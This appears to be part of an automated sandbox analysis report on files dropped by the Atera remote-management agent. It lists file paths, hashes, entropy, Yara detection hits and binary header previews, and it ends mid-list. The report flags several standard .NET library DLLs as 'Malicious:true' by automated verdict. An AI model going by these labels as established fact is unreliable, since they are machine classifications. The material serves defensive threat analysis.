                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):73256
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.953307803231714
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:y784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAsk76nf:y7N1r9KGI04CCAskwf
                                                                                                                                                                                                                                                                                                                                  MD5:9B233BD5FDD7AF8177F6F85224FF98CF
                                                                                                                                                                                                                                                                                                                                  SHA1:1A61D930F9EEF89A4561A880F7A5331C9A576365
                                                                                                                                                                                                                                                                                                                                  SHA-256:789BF4C5180E807102E33F75B843212E3C6D74ABE8F3FBA97ED3CD443D9AEFB3
                                                                                                                                                                                                                                                                                                                                  SHA-512:AF8AE3124F376072DD0D4733FB06C393BDF490BED6C11451DD2FC68436C442D94A60D129AC4A4414962B43AAB70CDFD512C06D93EB360B547E7AF241B1D6D349
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......>.....@.....................................O.... ..P...............((...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.8518491573807845
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:0r97WquW6/Nyb8E9VF6IYijSJIVxkp9oK4f:0RJKDEpYi60eHK
                                                                                                                                                                                                                                                                                                                                  MD5:F93FE4F480FFDAD9309F49DD63BDA546
                                                                                                                                                                                                                                                                                                                                  SHA1:AD829C8754D369FA59B29335522BAB4B0E7FCD71
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA5C5FB61F0F7B574C287032819F2D2AA482AE7963A18890FBDA182F3A227869
                                                                                                                                                                                                                                                                                                                                  SHA-512:BE0046D693F2CAFAA2000C9C43D3A3F51EFB21855D65D96C0E9EC81F5A9B78FD26510D2C788E9DE85BCC98A44FC106C804EC04E4C44FCFF9A483F7ECA216097F
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ..............................x.....@.................................\+..O....@..................((...`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.791670945936359
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:S16eWLDWGoNyb8E9VF6IYijSJIVx4Ic75l:O6LbAEpYi60w77
                                                                                                                                                                                                                                                                                                                                  MD5:74BAD85D3EE48A89E4F03DEC58FDF5ED
                                                                                                                                                                                                                                                                                                                                  SHA1:8B62ED30762A5B8B3D4CEBF394014A0A929125F5
                                                                                                                                                                                                                                                                                                                                  SHA-256:8D060E43D4F7893D8EF0ED05362A1030E097036895A637813C768D02A7DB83AD
                                                                                                                                                                                                                                                                                                                                  SHA-512:83291CB73FDE4B0626A358C5B562C9FEF5DE8E9AC302358B12B86132CA39EDE003BE8C5C56572B8B69B1F51C0C7E0E238D5A2B9E6DF2DDF06123525C2D0AC9C5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ....................................@.................................|*..O....@..................((...`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):16936
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.786405492808321
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwWU4Nyb8E9VF6IYijSJIVxPvvqE:BGZ5OwEpYi60v7
                                                                                                                                                                                                                                                                                                                                  MD5:3CBAA09A878FBE1B21F5C7B71C113EC1
                                                                                                                                                                                                                                                                                                                                  SHA1:A055C5111EB6DD0F1464E74B4B28DD0B8FE1DEE0
                                                                                                                                                                                                                                                                                                                                  SHA-256:BBD10B84456363D69CFE6993A06DF3A7B23025D28710596D18247D8F43DC8045
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4DDF058595B0BA1ABB9831043A597A832347A6A9344FBD24C855908626AC1C10062C09A7DEE1029904C04778DB94D8346E5B59C266DCB47A7D6D95C19D57CD
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ..............................Ab....@.................................z+..O....@..x...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.896898413791011
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:j6ziqTEkGWvRWH1Nyb8E9VF6IYijSJIVxKPtVUa:jYT1cREpYi600N
                                                                                                                                                                                                                                                                                                                                  MD5:73A5C82562EF738015E52E94E69805D4
                                                                                                                                                                                                                                                                                                                                  SHA1:699B25ADB46FC14215321E83659512CCB557DB8E
                                                                                                                                                                                                                                                                                                                                  SHA-256:08362C176C9A6233ED2DFC393A984C653FCDA4FB891B706381D613C763105B71
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6B28B3CE76D65420DC96171DFEC5F6E292ED20D46FBB7B48D4DFA961B88CA053D3F8F91D11E4398BA6A6485610670ACA769B93B1F6F30A1BCA653EE235D986C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ..............................3.....@..................................)..O....@..................((...`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlDocument.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.80616619726168
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:JUv7c7iWNCWq0Nyb8E9VF6IYijSJIVxILsyW:JM7c1m0EpYi600/W
                                                                                                                                                                                                                                                                                                                                  MD5:14ACFB91C522AABD4998A62FD09B8D1B
                                                                                                                                                                                                                                                                                                                                  SHA1:5568AC17F8A243FA6F4E5F84D7204963A755C2AA
                                                                                                                                                                                                                                                                                                                                  SHA-256:F9C8464E864561E09F6DB8B99F67B277325F2B2B17D338C60B99C6698C467FA2
                                                                                                                                                                                                                                                                                                                                  SHA-512:CE45D85CB2EC928865FC35BB307E15F5FF3742B8634B61AD043E1FB4F92C414E8F2CEA26FB1838F91626BB8E9E9E7EE72B6AA3F162C459E0C4A1F40C176E66C6
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ..............................7.....@..................................*..O....@..................((...`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.850300875865294
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:0+vxmNWnRW5TPMNyby2sE9jBF6IYiYF85S35IVnxGUHF8C8nS1k:JSWnRWJ0Nyb8E9VF6IYijSJIVxI+2
                                                                                                                                                                                                                                                                                                                                  MD5:38CEF0491433ECC2C4A44F7CB1938699
                                                                                                                                                                                                                                                                                                                                  SHA1:9AD5A0C62CB7B12EA743314AFB20094F36A3BED3
                                                                                                                                                                                                                                                                                                                                  SHA-256:6965333694A42240FE7409863C7C38DAAE420C69C7BBC7D6B68D099C421A2087
                                                                                                                                                                                                                                                                                                                                  SHA-512:38E9BC2DC123009C2E49BE6DCFF4C46184ACD035184A1A1E726F766EDDCAEE337F63CC3002C876AF10D4E743A6B30A352D9ED0E749908CBD93E7C34CABD2F09B
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... .............................. .....@.................................L+..O....@..$...............((...`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):92712
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.483789197688696
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:i2Ec05j4eAH64rh5fSt5T9nFcI94WYG769:RlK4eA7mDmWYGq
                                                                                                                                                                                                                                                                                                                                  MD5:750028196E9FF29D537CF54A2BFB1F9A
                                                                                                                                                                                                                                                                                                                                  SHA1:DE353C00D535075B69A25CE8D37D7F71728D3CA3
                                                                                                                                                                                                                                                                                                                                  SHA-256:A74072F8AC542FE0980BD9471E9CB63CAE905408D3F3DA6A400490BAEA3502F7
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F96F820D9CE957B1B1BB96AF065E2B18DE6ABD8E5811ACEE85D8E5ED573C371A6478DE5E8F6E6EF6BFE187539D6C59DA5020D208A614F9FD23810DA5F23E421
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M..Z.........." ..0..8...........U... ...`....... ....................................@..................................U..O....`..,............B..((........................................................... ............... ..H............text....6... ...8.................. ..`.rsrc...,....`.......:..............@..@.reloc...............@..............@..B.................U......H.......P ...4..................,U......................................BSJB............v4.0.30319......l...|...#~.....d...#Strings....L3......#US.T3......#GUID...d3..x...#Blob......................3................................q.....2B........e$.M...,.M.....M...4.M...1.M...1.M..v..M...*.M...*.M....p...........................!.....).....1.....9.....A.....I.................................#.......+.......3.......;.J.....C.f.....K.f...................2.....................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement.zip

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):3024177
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999932863466441
                                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:Qa/1hoqZnOG5FD1tE2DG2i8gXH0Jo3yYgJT/cyoK/OB0vr56vgFuIzyqY:n1jZOGZjDc5UZN/5D5fW
                                                                                                                                                                                                                                                                                                                                  MD5:57D8984A7BAE70C6FF3F85F71655241A
                                                                                                                                                                                                                                                                                                                                  SHA1:D747283E7621632A0E70C2926C315E6E5141A6BE
                                                                                                                                                                                                                                                                                                                                  SHA-256:A124B14F13DCEA8E25A9B7D9350E0B5527006E921F0C32FF922826F6564B170B
                                                                                                                                                                                                                                                                                                                                  SHA-512:67C468168F5A9782184E2A7CD0EBBC54B9FC4FDF2F72CCE51C3D03D5B46D4D8C2C8B54E9F74C3EF4A3F2CD53EE9F51DBB9CFF100ED4D9A19334888AB6C411788
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:PK..-......h\Y8.TN........?...AgentPackageProgramManagement/AgentPackageProgramManagement.exe....(......./n......B.1o..#.Ep.sI.._:.f.5..~|..F.M+.Yq!.u.YxW...}..9).Tn..@.y....fL&..6j...oop.LG..............1]x@...'...k..5......#..i:.^.o..e."..>~.R...5...t.+.....A..m..W#(.......B.,2...x..z...dI.<...9....tz..P..F..$K.yF..E6r.V..d.G.q.w..AM.jd.Kf).....d|...&T.I...A..g..:...:q..e..a...XQ.o.Q.h....@_y.i'...fc.0.........5..........x..j ..M..j....Rm....c.....E..5.D.Xa]'x....3....x..b....d0...e.../V#V.[...68cT.K.B.%./.K..n&.Ca...i,.$.t1.|.........Q.c..nn.#..._.b...F.W.&..}.1...}<o.C..U.....q.P. ....A......>).....h.^.Lf .8..Rn.N..).&......5......%x...d:f>.........X.el...W..S\..C.=/"..~.=........T..0.}S......h..u&..Q..T..1.C./.X.....V...dC...n..\.. .\.=.c:;.k...1s....b.'........4k.....y.x...a..X.5.......6PLD2.."...8*|..hf....q.I..L.......E.&N$.....R.]=..af...,&......Y....e.....AP.=...D..\...yK..j.Q.}a......`P.^.g.......M...j.]...&'...=/......D8.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):56872
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.185826483139663
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:hhNALo0bJCDMpSSbxvqtJxm7BltW76JUk:LNA80bJDpSAvYxsrtWCL
                                                                                                                                                                                                                                                                                                                                  MD5:715CA834B9645C0E8A37AC29F89E4C56
                                                                                                                                                                                                                                                                                                                                  SHA1:29F696945CDE25500B4F0C9767AFAE75231EB137
                                                                                                                                                                                                                                                                                                                                  SHA-256:B9A24B5A8D6E2CDB3B5FD5E22B415B42246E7ABA4E82EB193345E98128F9817A
                                                                                                                                                                                                                                                                                                                                  SHA-512:6BC37B78FAD4362967CC04FAD91DDBDC861185FBF1EAFDD580D44140BE6C045CBF07805F788516C331C1EB1AFC54C24B8DAB59F60366284353C5F819E2F8F7BF
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Y..g.........."...0.................. ........@.. ....................................`.....................................O.......................((..........|................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........Q...k...........................................................~....(....-..*.(....,..*(....~....(....(.....l(....(....*...0..3.......~....(....-.(...+*~....(.....(.....(....o....(...+*..0...........(.....~.....( ...*..0...........(.....~.....( ...*..0...........(....(......(!...*2.(....(....*v~....(....-.~"...*~....(....*...0...........(#....(.....o$...(%...*.0..g.......(&....('....o$......o(....s).......+......O...r...p(*...o+...&...X......i2..o,...o-........,..o.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe.config

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):1251
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.000868036244702
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:JdszvPF7N8OH2//3dVhOXrRH2/dV0PH2/+w3VUrPH2/+789y:3sB7iOgl27Rgdsg+w3Sg+78w
                                                                                                                                                                                                                                                                                                                                  MD5:16D1DF732FB7C3FE51EE9657C5AC458C
                                                                                                                                                                                                                                                                                                                                  SHA1:32CECF6AA8A03E11A967D54C67F9404F6A73D57B
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FC493DA952DF0968311A06FAC3A5D03FBC2351DB77D0D907A1FAFA4ADA08777
                                                                                                                                                                                                                                                                                                                                  SHA-512:1F33ADA48F1ECAFA9238B87A8743C0A92953D123A917E38EC9F7EA7B92A7514AF6F244E4E3F77141D9ABDC11D120641FBDE9318525E0C3F2DC16F6E1D91634C9
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>...<startup>... <supportedRuntime version="v4.0" />... <supportedRuntime version="v2.0.50727" />...</startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="log4net" publicKeyToken="669e0ddf0bb1aa2a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.0.12.0" newVersion="2.0.12.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Buffers" publicKeyToken="cc7b13ffcd2ddd51" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-4.0.3.0" newVersion="4.0.3.0" />.. </dependentAssembly>.. <dependentAssembly>.. <asse

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.ini

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):12
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.584962500721156
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:3:WhXQp:WBC
                                                                                                                                                                                                                                                                                                                                  MD5:39B44CA42C8612A5930265AEB5B57D01
                                                                                                                                                                                                                                                                                                                                  SHA1:BCDB0725DAC93FF166F3720FB857044B34D30915
                                                                                                                                                                                                                                                                                                                                  SHA-256:88BA4BC3ED257A32C86D2300EF9BB15B5737E94530BA27A806CBF5240302E64B
                                                                                                                                                                                                                                                                                                                                  SHA-512:8EB7DF51281CDA144DC77175CB2BDE02294184DE60DB93C80A166ACF37E64C3508DFC0F82EC1511AA2D5A72828B2E7F78D6CCEE0015924FC15DF52ABE4F1268A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:version=25.8

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):112168
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.178587216194047
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6gs5os2RUW33uzNrscqSofyqwshFDfuX73QbQgLb/xs8bRUi+kEWWdK76tUgX:60jjnl1wuDYjQbQgLbZs8DWdKuX
                                                                                                                                                                                                                                                                                                                                  MD5:2781AF2E1F4E70A05CC118BC18B3388A
                                                                                                                                                                                                                                                                                                                                  SHA1:5CF9B71C28883F932DDD2B3AAF23CAFC8F544536
                                                                                                                                                                                                                                                                                                                                  SHA-256:8C06899571D38EDFA137DA4950CD5D9F92DF644D41D54F954426C81E3A1C697E
                                                                                                                                                                                                                                                                                                                                  SHA-512:5D52F1C4C57E27618D2373B000BA937BBFBE888FBDB77104DCD03A685DB18A71759BF401A69BCC17E30B32AE8CDE8D467906198E1BFB284AC7E02BE577311803
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y.g.........." ..0.............b.... ........... ...................................`.....................................O.......8...............((.......................................................... ............... ..H............text...h.... ...................... ..`.rsrc...8...........................@..@.reloc..............................@..B................D.......H....... ....!...........................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p( ...r...p(!.........("...(#.....&..*........00......:.(......}....*..0..Z............($...,......(%...*~..........(&........($...-..(....s'...........,..((.........(%...*..........&E.......0..G........{....,.(......5~)...r'..po*...rm..pr...po+...ta...r...p(,..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dll

                                                                                                                                                                                                                                                                                                                                  Download File
